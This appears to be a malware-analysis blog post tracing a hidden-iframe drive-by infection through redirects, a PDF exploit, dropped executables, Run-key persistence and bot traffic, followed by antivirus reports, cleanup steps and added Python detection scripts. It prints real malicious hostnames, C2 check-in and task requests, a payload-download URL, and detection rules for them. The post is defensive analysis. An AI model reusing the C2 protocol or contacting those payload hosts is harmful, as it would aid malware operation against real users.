A user submitted to us a suspicious link that was present on his website as a hidden iframe.
Malicious hidden iframes are typically inserted into the HTML pages of legitimate websites by attackers who want to spread their malware to every user who visits the compromised site. In most cases the attacker has also modified many or all of the site's files, or has installed a redirect to other websites hosting exploits for commonly used web browsers.
The website could have been compromised because:
1) Your website contains scripts that are vulnerable to RFI/SQL injection/XSS/LFI/RCE, etc.
2) Your website is on a shared host, and if an attacker compromises one website hosted on the same server cluster as yours, they can infect ALL the websites on it (yours included).
Now let's see what would have happened if you had visited the infected website with the hidden malicious iframe.
The malicious hidden iframe looks like:

After I browsed to the malicious URL, I was redirected to another website that hosts a PDF exploit:

Traffic:
GET /in.cgi?cocacola46 HTTP/1.1
Host: litetopfindworld.cn

HTTP/1.1 302 Found

GET /index.php?cocacola46 HTTP/1.1
Host: ghrgt.hostindianet.com

HTTP/1.1 200 OK
Server: nginx/0.6.35
Content-Length: 6147
Below is the exploit screenshot:

We can see that the exploit redirected my browser to:
cache/readme.pdf => Another iframe redirect
cache/flash.swf => Another iframe redirect
Various files related to the malicious URLs were created in Temporary Internet Files:

After the files downloaded by the exploit were executed, new files were created on my system:
C:\WINDOWS\system32\wbem\grpconv.exe
C:\WINDOWS\Temp\wpv331238107706.exe
C:\WINDOWS\Temp\wpv761238313566.exe
C:\WINDOWS\system32\crypts.dll
C:\Documents and Settings\user\user.exe
The file C:\Documents and Settings\user\user.exe had the +H (Hidden) attribute set and was hidden from Explorer searches.
The DLL crypts.dll was injected into explorer.exe, and user.exe created a new registry entry so that it starts every time Windows starts:
HKCU\…\Run\user.exe
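The persistence described here (a Run entry pointing at a hidden binary dropped in the user's profile) is simple to check for. The following is an added example and not code from the original post: a Python script that evaluates autorun entries with the heuristics this case suggests. The Run key path is the standard HKCU\Software\Microsoft\Windows\CurrentVersion\Run (the post elides it); the sample entries are built from the paths listed above, and the function names (is_suspicious_autorun, is_hidden, check_entries) and the heuristics are this example's own assumptions.

```python
"""Flag autorun entries with the traits seen in this infection: a Run-key
value pointing at a binary in a user profile root or a Temp directory, and a
file carrying the +H attribute. Added example, not code from the original post."""
import os
import stat
import sys
from pathlib import PureWindowsPath

# Standard per-user autorun key (assumption: the post elides the full path).
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
# Path components a legitimate autorun rarely lives under (lower-cased).
SUSPECT_DIRS = {"temp", "tmp", "local settings", "application data", "appdata"}
# Parent folders of user profiles on XP and on Vista and later.
PROFILE_ROOTS = {"documents and settings", "users"}
FILE_ATTRIBUTE_HIDDEN = getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0x2)


def executable_of(command):
    """Return the program path from a Run value: '"C:\\x y\\a.exe" /q' -> 'C:\\x y\\a.exe'.
    Unquoted values are taken whole (arguments after a space would stay attached)."""
    c = command.strip()
    end = c.find('"', 1)
    if c.startswith('"') and end > 0:
        return c[1:end]
    return c


def is_suspicious_autorun(command):
    """Return the reasons an autorun command looks like malware persistence ([] if none)."""
    path = PureWindowsPath(executable_of(command))
    parts = [p.lower() for p in path.parts]
    reasons = []
    if SUSPECT_DIRS & set(parts):
        reasons.append("binary lives in a temp/appdata directory")
    # e.g. C:\Documents and Settings\user\user.exe -> drive, profile root, user, file
    if len(parts) == 4 and parts[1] in PROFILE_ROOTS:
        reasons.append("binary sits directly in a user profile root")
        if path.stem.lower() == parts[2]:
            reasons.append("binary named after the user account")
    return reasons


def is_hidden(path):
    """True if the file carries the +H attribute (Windows only; False elsewhere or if missing)."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return bool(getattr(st, "st_file_attributes", 0) & FILE_ATTRIBUTE_HIDDEN)


def enumerate_run_entries():
    """Yield (name, command) from the HKCU Run key on Windows; yields nothing elsewhere."""
    if sys.platform != "win32":
        return
    import winreg
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        i = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, i)
            except OSError:  # no more values
                break
            yield name, str(value)
            i += 1


def check_entries(entries):
    """Return [(name, command, reasons)] for the entries that trip a heuristic."""
    flagged = []
    for name, command in entries:
        reasons = is_suspicious_autorun(command)
        if is_hidden(executable_of(command)):
            reasons.append("file has the hidden attribute")
        if reasons:
            flagged.append((name, command, reasons))
    return flagged


# Constructed sample, modelled on the paths listed in the post.
SAMPLE_ENTRIES = [
    ("user.exe", r"C:\Documents and Settings\user\user.exe"),
    ("wpv", r"C:\WINDOWS\Temp\wpv331238107706.exe"),
    ("Updater", '"C:\\Program Files\\Vendor\\app.exe" /silent'),
]

if __name__ == "__main__":
    entries = list(enumerate_run_entries()) or SAMPLE_ENTRIES
    for name, command, reasons in check_entries(entries):
        print(f"{name}: {command}\n    " + "; ".join(reasons))
```

On the infected machine this runs against the live HKCU Run key; elsewhere it falls back to the constructed sample so the heuristics can be read and tested. The location checks are deliberately narrow (profile root, Temp, AppData) so that ordinary vendor updaters under Program Files are not reported; HKLM\...\Run and the RunOnce keys would need the same treatment.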
During the analysis, the malware established connections with several different domains and IPs:
94.247.3.152 (hs.3-152.zlkon.lv)
213.155.4.82 (N/A)
78.109.30.224 (reverse30-224.reserver.ru)
94.247.2.95 (hs.2-95.zlkon.lv)
68.180.151.74 (hansali4.com)
83.133.127.5 (.)
Traffic:
GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=xxx&rnd=xxx HTTP/1.1
Host: 213.155.4.82

POST /good/receiver/online HTTP/1.1
Host: 78.109.30.224
Content-Length: 16

guid=xxxxxx

GET /bt.php?mod=&id=xxx&up=xxx&mid=soboc42 HTTP/1.1
Host: af9f330a59.com

0SLP:3600;MOD:dAcbf6;URL:hxxp://hansali4.com/731l2.exe;SRV:stoped;

GET /731l2.exe HTTP/1.1
Host: hansali4.com

POST /gate/gate.php HTTP/1.0
Host: mixmediadirect.cn

194.8.74.51:443 => SSL traffic
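The requests above (redirector, bot check-in, task poll, payload download, gate POST) are exactly the kind of thing to turn into proxy-log detections while the hosts are still live. The following is an added example, not the author's tooling: a Python script that matches request records against rules derived from these captures and splits the task response into its fields. The one-request-per-line log format is constructed here, the rule labels are this example's own, and the meaning of the task fields (SLP, MOD, URL, SRV) is inferred from the single response in the post and should be read as an assumption.

```python
"""Match the beacon, task-poll and payload-download requests seen in the
capture above against proxy-style request records, and split the task
response into fields. Added example, not the author's tooling."""
import re

# (label, regex over "METHOD path host"); patterns generalised from the
# requests printed in the post.
RULES = [
    ("tds-redirector",  re.compile(r"^GET /in\.cgi\?\w+ ")),
    ("bot-checkin",     re.compile(r"controller\.php\?action=bot\b.*\bguid=")),
    ("bot-online-post", re.compile(r"^POST /\w+/receiver/online ")),
    ("bot-task-poll",   re.compile(r"/bt\.php\?mod=.*\bmid=")),
    ("gate-post",       re.compile(r"^POST /gate/gate\.php ")),
    ("exe-download",    re.compile(r"^GET /[\w./-]+\.exe ")),
]


def classify(method, path, host):
    """Return the rule labels a single request trips."""
    record = f"{method} {path} {host}"
    return [label for label, rx in RULES if rx.search(record)]


def parse_requests(log):
    """Yield (method, path, host) from 'METHOD path host' lines (constructed log format)."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[0] in ("GET", "POST"):
            yield parts[0], parts[1], parts[2]


# The task response is a run of 'KEY:VALUE;' pairs. The format is inferred
# from the single response in the post, so treat the field meanings as
# assumptions (SLP looks like a sleep interval, URL the next payload); the
# leading "0" before SLP is left unparsed.
TASK_FIELD = re.compile(r"([A-Z]+):([^;]*);")


def parse_task(body):
    """Return the task response as a {KEY: VALUE} dict."""
    return dict(TASK_FIELD.findall(body))


def run(log):
    """Return [(host, labels)] for every request in `log` that trips a rule."""
    hits = []
    for method, path, host in parse_requests(log):
        labels = classify(method, path, host)
        if labels:
            hits.append((host, labels))
    return hits


# Requests from the capture above, one per line (tokens left as xxx like the post).
SAMPLE_LOG = """\
GET /in.cgi?cocacola46 litetopfindworld.cn
GET /index.php?cocacola46 ghrgt.hostindianet.com
GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=xxx&rnd=xxx 213.155.4.82
POST /good/receiver/online 78.109.30.224
GET /bt.php?mod=&id=xxx&up=xxx&mid=soboc42 af9f330a59.com
GET /731l2.exe hansali4.com
POST /gate/gate.php mixmediadirect.cn
GET / hotmail.com
"""
SAMPLE_TASK = "0SLP:3600;MOD:dAcbf6;URL:hxxp://hansali4.com/731l2.exe;SRV:stoped;"

if __name__ == "__main__":
    for host, labels in run(SAMPLE_LOG):
        print(f"{host:<22} {', '.join(labels)}")
    task = parse_task(SAMPLE_TASK)
    print("next payload:", task.get("URL"), "sleep:", task.get("SLP"))
```

The rules key on URL structure rather than on the hostnames, because the hosts in such campaigns rotate while the script paths and parameter names tend to survive; the hotmail.com request correctly trips nothing, since a plain GET / carries no signal on its own.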
Finally, the malware started connecting to hotmail.com, probably to send spam to other email addresses or something similar:
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: hotmail.com
Connection: Keep-Alive

HTTP/1.1 302 Redirected
Date: Sun, 29 Mar 2009 16:59:07 GMT
Server: Microsoft-IIS/6.0
Location: hxxp://lc1.bay0.hotmail.passport.com/cgi-bin/login
Reports from the multi-engine virus scanner, first for the landing page and then for the downloaded executable:
Report Generated: 29.3.2009 at 19.57.41 (GMT 1)
Time for scan: 50 seconds
File Name: index[1].htm
File Size: 6 KB
MD5 Hash: 2F9467513FAE3071B8EC831857963340
SHA1 Hash: 59C6D7D70F529762FAD7408360E016D6C816EFB3
Detection Rate: 2 of 24 (8.33 %)
Status: INFECTED
Antivirus               Sig version       Engine version   Result
a-squared               29/03/2009        4.0.0.32         -
Avira AntiVir           7.1.2.228         8.1.2.12         -
Avast                   090328-0          4.8.1229         -
AVG                     270.11.31/2028    8.0.0.0          -
BitDefender             29/03/2009        7.0.0.2555       -
ClamAV                  29/03/2009        0.93.1.0         -
Comodo                  1087              3.8              -
Dr.Web                  29/03/2009        5.0              -
Ewido                   29/03/2009        4.0.0.2          -
F-PROT 6                20090328          4.4.4.56         JS/Psyme.IX
G DATA                  19.3655           2.0.7309.847     -
IkarusT3                27/03/2009        1001044          -
Kaspersky               29/03/2009        8.0.0.357        Trojan-Downloader.JS.Agent.duy
McAfee                  29/03/2009        5.1.0.0          -
Malware Hash Registry   29/03/2009        N/A              -
NOD32 v3                3972              3.0.677          -
Norman                  2009/03/27        5.92.08          -
Panda                   07/02/2009        9.5.1.00         -
QuickHeal               28 March, 2009    10.0             -
Solo Antivirus          29/03/2009        8.0              -
Sophos                  29/03/2009        4.32.0           -
TrendMicro              927(592700)       1.1-1001         -
VBA32                   29/03/2009        3.12.0.300       -
VirusBuster             10.102.26         1.4.3            -
Report Generated: 29.3.2009 at 19.56.42 (GMT 1)
Time for scan: 46 seconds
File Name: 731l2[1].exe
File Size: 71 KB
MD5 Hash: 6E14662D9469DFC1E6387F9C5D00513A
SHA1 Hash: C0E8B584E105ACED2A4CE403EF77CB45B3987E45
Detection Rate: 17 of 24 (70.83 %)
Status: INFECTED
Antivirus               Sig version       Engine version   Result
a-squared               29/03/2009        4.0.0.32         -
Avira AntiVir           7.1.2.228         8.1.2.12         TR/Downloader.Gen
Avast                   090328-0          4.8.1229         Win32:Trojan-gen {Other}
AVG                     270.11.31/2028    8.0.0.0          Downloader.Generic8.ZVT
BitDefender             29/03/2009        7.0.0.2555       Trojan.Generic.1545891
ClamAV                  29/03/2009        0.93.1.0         -
Comodo                  1087              3.8              Backdoor.Win32.KeyStart.~A
Dr.Web                  29/03/2009        5.0              Trojan.DownLoader.origin
Ewido                   29/03/2009        4.0.0.2          -
F-PROT 6                20090328          4.4.4.56         -
G DATA                  19.3655           2.0.7309.847     -
IkarusT3                27/03/2009        1001044          Backdoor.Win32.KeyStart
Kaspersky               29/03/2009        8.0.0.357        Backdoor.Win32.KeyStart.cb
McAfee                  29/03/2009        5.1.0.0          Generic Downloader.x trojan
Malware Hash Registry   29/03/2009        N/A              detect rate 74%
NOD32 v3                3972              3.0.677          Win32/TrojanDownloader.Agent.OWB
Norman                  2009/03/27        5.92.08          Trojan W32/DLoader.KZPW
Panda                   07/02/2009        9.5.1.00         -
QuickHeal               28 March, 2009    10.0             Backdoor.KeyStart.cb
Solo Antivirus          29/03/2009        8.0              Backdoor.Win32.KeyStart.CB
Sophos                  29/03/2009        4.32.0           Sus/Spy-B
TrendMicro              927(592700)       1.1-1001         -
VBA32                   29/03/2009        3.12.0.300       Backdoor.Win32.KeyStart.bz
VirusBuster             10.102.26         1.4.3            Backdoor.KeyStart.AD
Note the gap between the two reports: the JavaScript landing page is caught by only 2 of 24 engines while the dropped executable is caught by 17, so antivirus detection of the landing page alone is a weak defence against this kind of drive-by.
What to do to remove the infection?
Step 1: Clean the HTML pages
The first thing the system administrator needs to do is remove the malicious hidden iframe code from the HTML pages, then check the web server logs and the code of the installed PHP scripts for vulnerable code, since the iframe will simply be re-injected if the entry point is left open.
Step 2: Remove the infected files
To remove the infected files from your system you need to:
1) Delete all the created files, in my case:
C:\WINDOWS\system32\wbem\grpconv.exe
C:\WINDOWS\Temp\wpv331238107706.exe
C:\WINDOWS\Temp\wpv761238313566.exe
C:\WINDOWS\system32\crypts.dll
C:\Documents and Settings\user\user.exe
(crypts.dll is loaded inside explorer.exe, so Windows will refuse to delete it while that process is running: do this from Safe Mode or from an offline boot.)
2) Delete the malicious registry entry, in my case:
HKCU\…\Run\user.exe
3) Run a complete system scan with your antivirus to detect other possible malware installed on your computer.
4) Download, install and update NVT Malware Remover Tool and run a complete system scan of your computer.
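Step 1 above, and the description at the start of the post of how hidden iframes get injected into a site's pages, can be turned into a quick check before cleaning. The following is an added example and not the author's tooling (nor the NVT tool): a Python script that walks a web root and reports <iframe> tags hidden via 0x0/1x1 dimensions or inline styles. The sample page, the example.org/malicious.example/evil.example hostnames in it, the list of file extensions scanned and the function names are constructed for this example and not taken from the post.

```python
"""Scan a web root for hidden <iframe> tags of the kind injected into
compromised sites (0x0 / 1x1 frames, display:none, visibility:hidden,
off-screen positioning). Added example; not code from the original post."""
import os
import re
import sys
from html.parser import HTMLParser

# Inline-style fragments that make a frame invisible to the visitor.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"|(?:width|height)\s*:\s*0(?:px)?\s*(?:;|$)"
    r"|(?:left|top)\s*:\s*-\d{3,}",
    re.IGNORECASE,
)
# File types worth scanning on a typical PHP site (assumption).
SCAN_EXTS = (".html", ".htm", ".php", ".tpl")


class IframeCollector(HTMLParser):
    """Collect <iframe> tags whose attributes hide them from the visitor."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # html.parser lower-cases tag names
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        for dim in ("width", "height"):
            val = a.get(dim, "").strip().lower().rstrip("px").strip()
            if val.isdigit() and int(val) <= 1:   # 0x0 or 1x1 pixel frame
                reasons.append(f"{dim}={a[dim]}")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("style hides frame")
        if reasons:
            line, _ = self.getpos()
            self.findings.append({"line": line, "src": a.get("src", ""), "reasons": reasons})


def find_hidden_iframes(html):
    """Return the hidden iframes found in one HTML document."""
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    return parser.findings


def scan_tree(root, exts=SCAN_EXTS):
    """Walk `root` and map each file containing hidden iframes to its findings."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read())
            if hits:
                results[path] = hits
    return results


# Constructed sample page: one legitimate frame, two hidden ones.
SAMPLE = """<html><body>
<h1>Welcome</h1>
<iframe src="http://example.org/video" width="640" height="480"></iframe>
<iframe src="http://malicious.example/in.cgi?token" width="0" height="0" style="visibility:hidden"></iframe>
<div style="display:none"><iframe src="http://evil.example/x.php" style="display:none"></iframe></div>
</body></html>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]).items():
            for h in hits:
                print(f"{path}:{h['line']} iframe src={h['src']} ({', '.join(h['reasons'])})")
    else:
        for h in find_hidden_iframes(SAMPLE):
            print(h)
```

Run it as python hidden_iframes.py /var/www/html to scan a site; with no argument it runs over the embedded sample. It only finds literal iframe tags: an iframe written at runtime by obfuscated JavaScript (document.write with split strings, which is what the JS/Psyme and Trojan-Downloader.JS detections on the landing page point to) will not be seen, so also diff the served files against a clean backup or sort them by modification time to find what the attacker touched.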